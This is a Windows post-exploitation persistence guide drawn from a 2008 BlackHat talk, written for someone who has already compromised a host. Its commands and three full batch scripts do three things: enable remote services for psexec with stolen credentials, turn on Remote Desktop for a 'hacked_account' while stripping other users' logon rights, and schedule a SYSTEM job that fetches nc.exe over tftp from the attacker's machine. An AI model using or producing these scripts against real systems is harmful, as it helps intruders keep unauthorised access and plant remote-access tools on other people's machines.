2013-12-29 12:01:22 -05:00

Windows General Persistence Commands

Commands to run to maintain persistence on a system after you have exploited it. They are usually executed from a cmd.exe (or, on very old systems, command.com) prompt.

Enable psexec

The psexec tool executes processes on other systems over the network. According to Val Smith's and Colin Ames' BlackHat 2008 presentation (page 50), most systems now have the "ClipBook" service disabled, which psexec required, and the sc commands below re-enable the sub-systems it needs: NetDDE, NetDDE DSDM and ClipBook, in dependency order. Two caveats: these three services exist on Windows XP/2003 and earlier only (NetDDE was removed in Vista, so on later systems sc reports that the service does not exist, error 1060), and the Sysinternals PsExec binary itself only needs administrative credentials, SMB access (TCP 445) and a writable ADMIN$ share, into which it copies its PSEXESVC service. Note that the space after "start=" is required by sc.

c:\> net use \\[TargetIP]\ipc$ password /user:username
c:\> sc \\[TargetIP] config netdde start= auto
c:\> sc \\[TargetIP] config netddedsdm start= auto
c:\> sc \\[TargetIP] config clipsrv start= auto
c:\> sc \\[TargetIP] start netdde
c:\> sc \\[TargetIP] start netddedsdm
c:\> sc \\[TargetIP] start clipsrv
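The same procedure as a script, added here as an example; it is not from the page or the Smith/Ames slides. It checks that each service actually exists before changing anything (sc prints "FAILED 1060" for a service that is not installed, which is what you get on Vista and later), then reads back the service state. The script name, argument order and the "[+]/[-]" output format are this example's own choices; it assumes administrative credentials on the target and SMB reachability.

```batch
@echo off
REM enable_psexec_services.cmd - added example; not from the page or the cited
REM slides. Usage: enable_psexec_services.cmd TargetIP username password
REM Assumes administrative credentials on the target, SMB reachable, and a
REM Windows XP/2003-era target on which the NetDDE/ClipBook services exist.
setlocal
if "%~3"=="" (
    echo usage: %~nx0 TargetIP username password
    exit /b 1
)
set TARGET=%~1
set USER_=%~2
set PASS_=%~3

REM Authenticate to IPC$ first; sc reuses that SMB session for \\%TARGET%.
net use \\%TARGET%\ipc$ %PASS_% /user:%USER_% >nul
if errorlevel 1 (
    echo [-] net use to \\%TARGET%\ipc$ failed
    exit /b 1
)

REM "sc query" on a service that is not installed prints "OpenService FAILED
REM 1060" (the case on Vista and later, where NetDDE was removed). Stop before
REM touching anything rather than leaving half-configured services behind.
for %%S in (netdde netddedsdm clipsrv) do (
    sc \\%TARGET% query %%S | find "1060" >nul
    if not errorlevel 1 (
        echo [-] service %%S is not installed on %TARGET%; no XP/2003 NetDDE stack here
        goto :done
    )
)

REM Set to auto-start and start, in dependency order (clipsrv needs
REM netddedsdm, which needs netdde). Note the space after "start=".
for %%S in (netdde netddedsdm clipsrv) do (
    sc \\%TARGET% config %%S start= auto >nul
    sc \\%TARGET% start %%S >nul
)

REM Read back the STATE line of each service ("STATE : 4  RUNNING").
for %%S in (netdde netddedsdm clipsrv) do (
    for /f "tokens=1,3 delims=: " %%A in ('sc \\%TARGET% query %%S ^| find "STATE"') do (
        echo [+] %%S on %TARGET%: %%B
    )
)

:done
net use \\%TARGET%\ipc$ /delete >nul
endlocal
```

The script tears down the IPC$ session at the end; if you intend to run psexec straight afterwards you can leave it connected, since psexec will otherwise authenticate again with the same credentials.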

Enable Remote Desktop

Remote Desktop allows a remote user to receive a graphical "desktop" of the target (compromised) system. According to Val Smith's and Colin Ames' BlackHat 2008 presentation (page 53), you can enable Remote Desktop on a compromised system, and grant your account the right to use it, with the steps below.

  1. On the compromised system, create a file named fix_ts_policy.ini with the contents below, replacing "hacked_account" with the account you have compromised on that system.

     [Unicode]
     Unicode=yes
     [Version]
     signature="$CHICAGO$"
     Revision=1
     [Privilege Rights]
     seremoteinteractivelogonright = hacked_account
     seinteractivelogonright = hacked_account
     sedenyinteractivelogonright =
     sedenyremoteinteractivelogonright =
     sedenynetworklogonright =
    
  2. Create another file named enable_ts.reg containing the contents below.

     Windows Registry Editor Version 5.00
     [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
     "fDenyTSConnections"=dword:00000000
     "TSEnabled"=dword:00000001
     "TSUserEnabled"=dword:00000000
    
  3. On the compromised system, execute the following commands. The two copy commands keep a pristine backup (orig.secedit.sdb) and a working copy (new.secedit.sdb) of the local security database; secedit merges the template into the working copy.

     c:\> sc config termservice start= auto
     c:\> regedit /s enable_ts.reg
     c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\new.secedit.sdb
     c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\orig.secedit.sdb
     c:\> secedit /configure /db c:\windows\security\database\new.secedit.sdb /cfg fix_ts_policy.ini
     c:\> gpupdate /Force
     c:\> net start "terminal services"

Three things to keep in mind: secedit replaces each listed right with exactly the accounts given, so every other principal loses interactive and remote interactive logon on that host (noisy, and a lockout risk for legitimate administrators); if the machine is domain-joined and a GPO defines those rights, gpupdate re-applies the GPO and undoes the change; and on XP SP2 / 2003 SP1 and later the Windows Firewall must also allow TCP 3389.
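Steps 1 to 3 as one script, added here as an example; it is not from the page or the Smith/Ames slides. It writes the same template, sets the same three registry values (with reg add rather than importing the .reg file), backs up the security database once, applies only the USER_RIGHTS area of the template, opens the XP SP2 firewall for Remote Desktop, and verifies that the service is running and that something listens on 3389. The script name, the use of %TEMP% for the template, the log-file name and the "[+]/[-]" output are this example's own choices.

```batch
@echo off
REM enable_rdp.cmd - added example; not from the page or the cited slides.
REM Run locally on the compromised Windows XP/2003 host as an administrator.
REM Usage: enable_rdp.cmd account     (the account to grant RDP logon to)
REM Assumes the account exists and that reg.exe, secedit.exe, gpupdate.exe
REM and netsh.exe are present, which they are on XP/2003.
setlocal
if "%~1"=="" (
    echo usage: %~nx0 account
    exit /b 1
)
set ACCT=%~1
set DBDIR=%SystemRoot%\security\database
set INF=%TEMP%\fix_ts_policy.ini

REM 1. Security template with the same five rights as fix_ts_policy.ini.
REM    secedit REPLACES each right with the list given, so afterwards only
REM    %ACCT% may log on interactively or via RDP; orig.secedit.sdb is the
REM    way back.
(
    echo [Unicode]
    echo Unicode=yes
    echo [Version]
    echo signature="$CHICAGO$"
    echo Revision=1
    echo [Privilege Rights]
    echo seremoteinteractivelogonright = %ACCT%
    echo seinteractivelogonright = %ACCT%
    echo sedenyinteractivelogonright =
    echo sedenyremoteinteractivelogonright =
    echo sedenynetworklogonright =
) > "%INF%"

REM 2. The three values from enable_ts.reg, written with reg add.
set TSKEY=HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server
reg add "%TSKEY%" /v fDenyTSConnections /t REG_DWORD /d 0 /f >nul
reg add "%TSKEY%" /v TSEnabled /t REG_DWORD /d 1 /f >nul
reg add "%TSKEY%" /v TSUserEnabled /t REG_DWORD /d 0 /f >nul

REM 3. Back up the local security database (never overwrite an existing
REM    backup), apply only the user-rights area of the template to a working
REM    copy, refresh policy and start the service.
if not exist "%DBDIR%\orig.secedit.sdb" copy "%DBDIR%\secedit.sdb" "%DBDIR%\orig.secedit.sdb" >nul
copy /y "%DBDIR%\secedit.sdb" "%DBDIR%\new.secedit.sdb" >nul
sc config termservice start= auto >nul
secedit /configure /db "%DBDIR%\new.secedit.sdb" /cfg "%INF%" /areas USER_RIGHTS /log "%TEMP%\fix_ts_policy.log" /quiet
gpupdate /force >nul
net start "terminal services" >nul 2>&1

REM 4. XP SP2 / 2003 SP1 ship a host firewall that blocks 3389 by default;
REM    harmless on builds without it.
netsh firewall set service type=REMOTEDESKTOP mode=ENABLE >nul 2>nul

REM 5. Verify: service state and a listener on TCP 3389.
sc query termservice | find "RUNNING" >nul
if errorlevel 1 (echo [-] termservice not running, see %TEMP%\fix_ts_policy.log) else (echo [+] termservice running)
netstat -an | find ":3389" | find "LISTENING" >nul
if errorlevel 1 (echo [-] nothing listening on 3389) else (echo [+] 3389 listening)

del "%INF%"
endlocal
```

To revert, run secedit /configure /db "%SystemRoot%\security\database\orig.secedit.sdb" /areas USER_RIGHTS, set fDenyTSConnections back to 1 and stop the service; the secedit log records which rights were changed.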

Scheduler

The Windows scheduler can be used to further compromise a system: jobs created with at run under the SYSTEM account. According to Val Smith's and Colin Ames' BlackHat 2008 presentation (page 58), you can remotely schedule tasks using the commands below. The time is given in 24-hour notation and is interpreted by the target's clock, the Task Scheduler service must be running on the target, and at.exe is deprecated in favour of schtasks from Windows 8 / Server 2012 on.

c:\> net use \\[TargetIP]\ipc$ password /user:username
c:\> at \\[TargetIP] 12:00 command

An example you might run against the remote system: at \\192.168.1.1 12:00 tftp -i [MyIP] GET nc.exe (the job runs as SYSTEM from the scheduler's working directory, so give tftp a full destination path if you need to find the file afterwards).
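The same thing as a script, added here as an example; it is not from the page or the Smith/Ames slides. It computes a run time two minutes ahead from the local clock (batch has no date arithmetic, and leading zeros trip set /a), schedules the page's tftp example with a full destination path, and lists the target's queue so you can see the job ID. The script name, argument order, the two-minute delay, the c:\windows\system32 destination and the schtasks equivalent in the comment are this example's own choices.

```batch
@echo off
REM at_remote.cmd - added example; not from the page or the cited slides.
REM Usage: at_remote.cmd TargetIP username password MyIP
REM Assumes administrative credentials on the target, the Task Scheduler
REM service running there, and a TFTP server on MyIP serving nc.exe (the
REM page's example payload).
setlocal
if "%~4"=="" (
    echo usage: %~nx0 TargetIP username password MyIP
    exit /b 1
)
set TARGET=%~1
set USER_=%~2
set PASS_=%~3
set MYIP=%~4

net use \\%TARGET%\ipc$ %PASS_% /user:%USER_% >nul
if errorlevel 1 (
    echo [-] net use to \\%TARGET%\ipc$ failed
    exit /b 1
)

REM Build a 24-hour HH:MM two minutes ahead from %TIME% ("HH:MM:SS.cc", hour
REM padded with a space before 10:00). The "1xx - 100" trick stops set /a
REM from reading "08" or "09" as invalid octal. The target's clock decides
REM when the job runs; compare with "net time \\%TARGET%" if in doubt.
set HH=%TIME:~0,2%
set MM=%TIME:~3,2%
set /a HH=1%HH: =0% - 100
set /a MM=1%MM% - 100 + 2
if %MM% GEQ 60 set /a MM-=60, HH+=1
if %HH% GEQ 24 set /a HH-=24
set HH=0%HH%
set MM=0%MM%
set RUNAT=%HH:~-2%:%MM:~-2%

REM Jobs created with at run as SYSTEM and non-interactively; give tftp a
REM full destination path instead of relying on the job's working directory.
at \\%TARGET% %RUNAT% "tftp -i %MYIP% GET nc.exe c:\windows\system32\nc.exe"

REM List the queue on the target to confirm the job and learn its ID
REM (remove it later with: at \\%TARGET% ID /delete).
at \\%TARGET%

REM Equivalent for Windows 8 / Server 2012 and later, where at.exe is deprecated:
REM schtasks /create /s %TARGET% /u %USER_% /p %PASS_% /sc once /st %RUNAT% /ru SYSTEM /tn upd /tr "tftp -i %MYIP% GET nc.exe c:\windows\system32\nc.exe"

net use \\%TARGET%\ipc$ /delete >nul
endlocal
```

The tftp client is not installed by default on Vista and later, so on those hosts the scheduled command needs a different transfer method even if the job itself is created successfully.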